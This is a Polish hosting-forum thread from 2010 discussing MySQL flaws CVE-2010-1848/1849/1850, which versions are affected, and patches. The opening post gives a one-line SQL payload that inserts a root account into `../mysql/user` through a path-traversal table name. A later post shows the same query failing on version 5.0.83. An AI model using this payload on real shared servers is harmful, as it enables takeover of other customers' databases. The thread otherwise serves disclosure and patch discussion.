Gość pioklo Zgłoś post Napisano Czerwiec 10, 2010 Witam Mysql niedawno zalatal pewna luke bezpieczenstwa w serwerze Bug#53371, CVE-2010-1848 Bug#53237, CVE-2010-1850 Bug#50974, CVE-2010-1849 wiekszosc firm hostingowych jest podatna na ten atak .Atakujacy moze zmienic sobie haslo roota przez proste zapytanie UPDATE i miec dostep do calej bazy i wszystkich danych Jezeli baza jest dzielona miedzy uzytkownikami a tak zazwyczaj jest wystarczy polaczyc sie do niej i wykonac zapytanie sql INSERT INTO `../mysql/user` (Host,User,Password,Select_priv,Insert_priv) VALUES('%','root',PASSWORD('pass3'),'Y','Y'); i mozemy cieszyc sie zdalnym dostepem do wszystkich danych.Nie ma co pisac ktora firma nie zaktualizowala jeszcze tych luk ale wystarczy popatrzec na wersje serwera jaki uzywaja jezeli wersja jest mniejsza od 5.1.47 lub 5.0.91 to nie zakladalbym konta w takiej firmie pozdrawiam Piotr Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Czerwiec 10, 2010 $ mysql -u monty -h 192.168.1.16 -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1 Server version: 5.0.83-log OpenBSD port: mysql-server-5.0.83 Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> INSERT INTO `../mysql/user` (Host,User,Password,Select_priv,Insert_priv) VALUES('%','root',PASSWORD('pass3'),'Y','Y' ); ERROR 1103 (42000): Incorrect table name '../mysql/user' Fail? Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość pioklo Zgłoś post Napisano Czerwiec 10, 2010 ERROR 1103 (42000): Incorrect table name '../mysql/user'[/code] Fail? In MySQL 5.0 and above, this allowed an authenticated user with SELECT privileges on one table to obtain the field definitions of any table in all other databases and potentially of other MySQL instances accessible from the server's file system. w wersji 5.0 jest mozliwosc odczytania definicji dowolnej tabeli natomiast w 5.1 mozna uzyc insertu czy update tak jak to wyzej napisalem.Do wersji starszych 4.1 i 4.0 goddaddy wydal napisal odpowiednie pacze sa dostepne na https://launchpad.net/~percona-dev/percona-patches/4.1.24 Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Czerwiec 10, 2010 w wersji 5.0 jest mozliwosc odczytania definicji dowolnej tabeli Pff... Czyli wielkie halo o nic? natomiast w 5.1 mozna uzyc insertu czy update tak jak to wyzej napisalem. Pokaż mi usługodawcę w Polsce, który ma 5.1 i jeszcze go nie zaktualizował Do wersji starszych 4.1 i 4.0 goddaddy wydal napisal odpowiednie pacze sa dostepne na https://launchpad.net/~percona-dev/percona-patches/4.1.24 Nie GoDaddy, tylko Percona Udostępnij ten post Link to postu Udostępnij na innych stronach
Gość pioklo Zgłoś post Napisano Czerwiec 10, 2010 5.1 wersje uzywa duzo firm nie ma sensu tutaj wytykac palcami .Pacze do wersji 4.1 wydal godaddy a nie percona jak twierdzisz.. http://www.mysqlperformanceblog.com/2010/06/02/security-fixes-for-mysql-4-0-and-4-1/ Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Czerwiec 10, 2010 5.1 wersje uzywa duzo firm nie ma sensu tutaj wytykac palcami. Nie twierdzę, że nie używają 5.1. Mam natomiast cichą nadzieję, że jeżeli jakaś firma używa wersji innej niż ta ze standardowej paczki (która w większości przypadków nadal pochodzi z linii 5.0.x), to zatrudnia kogoś, kto w ciągu 2 tygodni potrafił zrobić aktualizację Pacze do wersji 4.1 wydal godaddy a nie percona jak twierdzisz..http://www.mysqlperformanceblog.com/2010/06/02/security-fixes-for-mysql-4-0-and-4-1/ Faktycznie, mój błąd. Udostępnij ten post Link to postu Udostępnij na innych stronach
ddsj 0 Zgłoś post Napisano Czerwiec 10, 2010 Problem faktycznie występuje w mysql 5.1.45 (5.1.x) i nie występuje w 5.1.47, co właśnie sam sprawdziłem. Luka pozwana na uzyskanie uparwnień roota w mysql-u, zmianę hasła dowolnego usera, zmianę uprawnień dowolnego usera itd. Nie ma co chłopaki od mysql się bardzo nie popisali, szczególnie nie informując wogóle o istnieniu problemu w changelogu http://dev.mysql.com...ews-5-1-47.html Kto mi pokaże gdzie w changelogu jest informacja o załataniu tego KRYTYCZNEGO problemu? Są 3 informacje securityfix, ale żadna raczej nie pasuje do tego problemu, a już napewno nie mówi o wadze problemu. Nie no po prostu za***iście się spisali informując o swojej wpadce Udostępnij ten post Link to postu Udostępnij na innych stronach
dominikg 0 Zgłoś post Napisano Czerwiec 10, 2010 Ja nic o tym nie wiem, żeby jakaś luka była w mysqlu, jeszcze się z takim przypadkiem nie spotkałem. Udostępnij ten post Link to postu Udostępnij na innych stronach
ddsj 0 Zgłoś post Napisano Czerwiec 10, 2010 Ja nic o tym nie wiem, żeby jakaś luka była w mysqlu, jeszcze się z takim przypadkiem nie spotkałem. to przeczytaj wyżej Udostępnij ten post Link to postu Udostępnij na innych stronach
p 3 Zgłoś post Napisano Czerwiec 10, 2010 Nie ma co chłopaki od mysql się bardzo nie popisali, szczególnie nie informując wogóle o istnieniu problemu w changeloguhttp://dev.mysql.com...ews-5-1-47.html Kto mi pokaże gdzie w changelogu jest informacja o załataniu tego KRYTYCZNEGO problemu? Są 3 informacje securityfix, ale żadna raczej nie pasuje do tego problemu, a już napewno nie mówi o wadze problemu. Nie no po prostu za***iście się spisali informując o swojej wpadce Pierwszy Security Fix. Udostępnij ten post Link to postu Udostępnij na innych stronach
Prohost 345 Zgłoś post Napisano Czerwiec 12, 2010 jezeli wersja jest mniejsza od 5.1.47 lub 5.0.91 to nie zakladalbym konta w takiej firmie Bardzo mądre - a jak ktoś używa paczek np. centosa gdzie najnowsza wersja która jest zabezpieczona to 5.0.77 bo backportuja fixy? Udostępnij ten post Link to postu Udostępnij na innych stronach
